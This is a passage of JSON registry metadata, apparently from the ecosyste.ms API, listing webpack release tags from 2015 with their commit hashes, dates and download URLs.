om/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"pur